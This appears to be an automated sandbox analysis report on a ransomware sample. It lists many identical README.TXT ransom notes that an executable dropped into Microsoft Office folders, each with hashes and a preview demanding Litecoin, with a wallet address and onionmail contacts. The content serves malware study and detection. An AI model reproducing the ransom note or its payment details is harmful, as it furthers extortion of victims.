                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000050\dist\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000054\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000055\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000064\dist\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000068\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000069\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000070\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000072\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000076\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000079\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000084\fluidhost\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000088\Filter\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000088\UserActivityUX\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000098\_office_iss_excel_shared_ux\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
